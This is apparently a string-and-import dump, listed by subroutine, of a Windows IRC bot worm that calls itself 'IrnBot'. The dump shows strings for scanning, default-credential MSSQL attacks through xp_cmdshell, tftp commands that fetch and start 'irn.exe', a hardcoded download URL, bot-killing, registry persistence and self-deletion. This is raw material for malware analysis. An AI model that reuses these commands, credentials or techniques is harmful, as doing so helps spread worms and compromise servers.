sub_outside():
	KERNEL32.GetProcAddress
	KERNEL32.ExitProcess

sub_419641(07ab):
	"VIS"
	"2K3"
	"XP"
	"2K"
	"ME"
	"98"
	"NT"
	"95"
	"UNK"
	"[OS: Microsoft Windows %s %s (%i.%i bui"...
	"%s"

sub_4117DB(08d2):
	"CONOUT$"

sub_405616(090a):
	"KERNEL32.DLL"

sub_4198AD(0947):
	"@echo	off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
	"%s\\tmp-%i%i%i-%c%c%c.bat"
	"w"
	"%s"

sub_48B8AB(0cc3):
	KERNEL32.GetModuleHandleA

sub_41B981(0e5a):
	"rb"
	"ЎЎЙЙ"
	"TFTP:	Send Complete To %s. %d	Total Sen"...

sub_41A45D(15eb):
	"SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
	"%s\\%s"
	"LDM"
	"NetDDE"
	"EventMessageFile"

sub_40F8D4(1716):
	USER32.GetProcessWindowStation
	USER32.MessageBoxA

	"USER32.DLL"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
	"GetUserObjectInformationA"
	"GetProcessWindowStation"

sub_418B86(17c7):
	"%x"

sub_41A19C(1b08):
	KERNEL32.Thread32First
	KERNEL32.OpenThread
	KERNEL32.Thread32Next

sub_41A138(1b08):
	KERNEL32.Thread32First
	KERNEL32.OpenThread
	KERNEL32.Thread32Next

sub_4027F4(227c):
	"Scanner"
	"Scan:	All Scan Threads Stopped. %d kill"...

sub_40223C(283c):
	"Net: IP: %s Host: N/A"
	"Net: IP:	%s Host: %s"

sub_41AD77(2b9b):
	"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
	"~MHz"
	"ProcessorNameString"
	"%s"
	"%s%c"
	"Unknown"
	"HARDWARE\\DESCRIPTION\\System\\CentralProc"...

sub_417C7B(2ce1):
	"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
	"["
	"%s%s|"
	"%s%s|"
	"%sP|"
	"%s0%I64u|"
	"%s%I64u|"
	"%s%c"
	"%s]"

sub_417E66(2e07):
	" "
	"-s"
	"/s"
	" "

sub_419EC1(2f90):
	"olTznSALKZkJESmT"
	"olTznSALKZkJESmT"

sub_48CB6C(3a91):
	KERNEL32.GetModuleHandleA
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress

sub_419B37(4006):
	"192.168.*.*"
	"10.*.*.*"
	"111.*.*.*"
	"15.*.*.*"
	"16.*.*.*"
	"101.*.*.*"
	"110.*.*.*"
	"112.*.*.*"
	"172.%d.*.*"

sub_411780(4634):
	"KERNEL32"
	"IsProcessorFeaturePresent"

sub_410E04(4658):
	"e+000"

sub_41881F(4738):
	"ТГСС"
	"%s %s\r\n"
	"%s-%s"
	"МЛБЙ"
	"ЧСЗР"
	"%s %s\r\n%s %s 0 0 :%s\r\n"

sub_41C28D(48ad):
	"--install "
	"%s\\%s"
	"%s %s%s"
	"%s"
	"ПЧЦЗЦКЗЗЪ"
	"RM"
	"BK"
	"UNM"

sub_401DA7(496a):
	"http://%s:%d/%s"

sub_419E67(4a5c):
	"user32.dll"

sub_4028D4(4e0b):
	"Statistics: Exploits:"
	"%s %s: %d"
	"%s;	Daemons:"
	"%s TFTP: %d"
	"%s HTTP: %d"

sub_417776(50c0):
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...

sub_4022D6(51c2):
	"Scan:	Unknown	Exploit."
	"*.*.*.*"
	"-a"
	"-b"
	"-c"
	"Scan:	Not Enough Threads. %d Available."...
	"%d.%d.%d.%d"
	"x."
	"%d."
	"%s%d."
	"%sx."
	"%sx"
	"%s%d"
	"%d.%d.%d.%d"
	"%d.%d.%d.x"
	"%d.%d.x.x"
	"%d.x.x.x"
	"Scan:	%s:%d Using %d Threads."
	"Scanner"

sub_40207A(56d8):
	"System: %s [CPU: %i x	%s @ %dMhz] [RAM:"...

sub_40AA2F(58d9):
	"pow"
	"exp"
	"exp"
	"log10"
	"log10"
	"log"
	"log"
	"pow"
	"pow"
	"exp10"

sub_417B51(5fcf):
	"ТРЛФПСЕ"
	"%s %s %s\r\n"

sub_41A0C2(608f):
	KERNEL32.ReadProcessMemory

sub_41B751(6107):
	"sa"
	"root"
	"admin"
	"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
	"EXEC master..xp_cmdshell 'tftp -i %s GE"...
	"%s: Exploited	%s."

sub_401C1D(6279):
	"QUIT :Irn Powered\r\n"

sub_41BED6(64a5):
	"Mozilla/5.0"
	"DL: Downloading %s to	%s"
	"DL: Download %s (%i Bytes) finished in "...
	"Main:	Uninstalling Drone"
	"DL: Failed; Bad Location."
	"DL: Failed To	Update"
	"DL: Error Executing File."
	"DL: Executed File: %s"
	"DL: Failed; Bad URL"
	"DL: Failed; WinINET Error"

sub_4881C3(67ef):
	KERNEL32.ExitProcess

sub_4085AF(6a78):
	"ccs="
	"UTF-8"
	"UTF-16LE"
	"UNICODE"

sub_407C31(6b26):
	"mscoree.dll"
	"CorExitProcess"

sub_4016BA(6c31):
	"list	too long"

sub_40121E(6c31):
	"list	too long"

sub_419C67(6d5f):
	"Registry	Monitor"
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"QUIT :%s YOU KILLED ME :< --UPDATED\r\n"

sub_40CEC4(7249):
	"kernel32.dll"
	"InitializeCriticalSectionAndSpinCount"

sub_418CAF(726a):
	"\r\n"
	" "
	" "
	" "
	"\r\n\r\n"

sub_41A28F(7c37):
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...

sub_402A79(7f6b):
	"invalid string position"

sub_401E4A(85c4):
	"S4:Already Running"

sub_48CC25(8677):
	USER32.MessageBoxA
	KERNEL32.ExitProcess

sub_4197B6(88b5):
	"%d.%d.%d.%d"

sub_418A8C(8bd0):
	"МЛБЙ"
	"%s %s\r\n"

sub_41802D(93dd):
	"%s"
	" :"
	"%s"
	" "
	"%s"
	" "
	"ТЛМЕ"
	"ЙЛБЙ"
	"ТРЛФПСЕ"
	"ТНМЕ"
	"%s %s\r\n"
	"ЎЎЙЙ"
	"ИНЛМ"
	"%s %s %s\r\n"
	"001"
	"ИНЛМ"
	"ПНЖЗ"
	"ЎЎЙЙ"
	"%s %s %s\r\n%s %s %s\r\n"
	"332"
	" :"
	"%s"
	"!"
	"%s"
	"332"
	"%s"
	"%s"
	"%s"
	";"
	";"
	";"

sub_41930F(9941):
	"%s\\%s"

sub_401D0C(a01a):
	"JOIN	%s %s\r\n"
	"JOIN	%s\r\n"
	"I: Insufficient Arguments."

sub_405886(a9bf):
	"KERNEL32.DLL"
	"FlsGetValue"
	"FlsSetValue"
	"FlsFree"

sub_41A690(aba5):
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.OpenProcess
	KERNEL32.ReadProcessMemory
	KERNEL32.Process32Next

	"OpenThread"
	"kernel32.dll"
	"OpenProcess"
	"kernel32.dll"
	"CreateToolhelp32Snapshot"
	"kernel32.dll"
	"Process32First"
	"kernel32.dll"
	"kernel32.dll"
	"kernel32.dll"
	"Module32Next"
	"kernel32.dll"
	"kernel32.dll"
	"Thread32Next"
	"kernel32.dll"
	"ReadProcessMemory"
	"kernel32.dll"
	"GetModuleFileNameExA"
	"psapi.dll"
	"%s\\%s"
	"SeDebugPrivilege"
	"SeDebugPrivilege"
	"System"
	"ЎЎЙЙ"
	"Bot Killed: %s"

sub_419507(aecd):
	"HS"

sub_418D42(b570):
	"GET"
	"Que?"
	"HTTP/1.1 501 Not Implemented\r\nContent-L"...
	"%s\\%s\\%s"
	"%s\\%s\\%s%s"
	"%s\\%s"
	"Que?"
	"Que?"
	"HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
	"ЎЎЙЙ"
	"HTTP:	Transfer: %d.%d.%d.%d (N/A). %d	T"...
	"HTTP:	Transfer: %d.%d.%d.%d (%s). %d To"...

sub_419430(c642):
	"IrnBot"

sub_401D67(c802):
	"PART	%s\r\n"
	"I: Insufficient Arguments."

sub_409E64(cd6e):
	"Runtime Error!\n\nProgram: "
	""
	"..."
	"\n\n"
	"Microsoft Visual C++ Runtime Library"

sub_4145BE(d3bd):
	"S4: bind() Error"
	"S4: %s:%i"
	"SC"

sub_41BD26(dd03):
	"TFTP	Server"

sub_4019F3(e2f5):
	"¶·±і·іБЗґґ·З»З¶Д±ЗєАБ¶Д¶іБ¶А°ЖЖµµ°ДЗє±°"...
	"UPD: Auth Failure."
	"UPD: Invalid Arguments."

sub_412E61(e396):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"

sub_4054D7(e3a2):
	"KERNEL32.DLL"

sub_405543(e3a2):
	"KERNEL32.DLL"

sub_417909(e4c8):
	"%s\\%s"
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...

sub_41C135(e4d4):
	"http://217.67.229.212/phpbb/uploads/jpb"...
	"C:\\jpb.exe"
	"DL"

sub_41AFA7(e56c):
	"."
	"\\\\%s\\ipc$"
	"\\\\%s\\pipe\\browser"
	"http://%s:%d/%s"
	"http://%s:%d/%s"
	"%s: Exploited: %s."

sub_41A200(e5e3):
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Module32First
	KERNEL32.Module32Next

sub_41AB81(ead5):
	"tftp -i %s GET irn.exe&start irn.exe&ex"...

sub_401FD7(ed2d):
	"S4: Thread Stopped"
	"S4: No Thread	Running"

sub_4186F1(ef3c):
	"\r\n"
	"%s"
	"\r\n"

sub_41BDAA(f270):
	"%s"
	"%s%X"

sub_40177B(f394):
	"ГДГДґЗ·А±¶··ґАґ¶ЖіА·°¶є°ЗµґіГ¶єіµґГГіБґ"...
	"DL: Auth Failure."
	"DL: Invalid Arguments"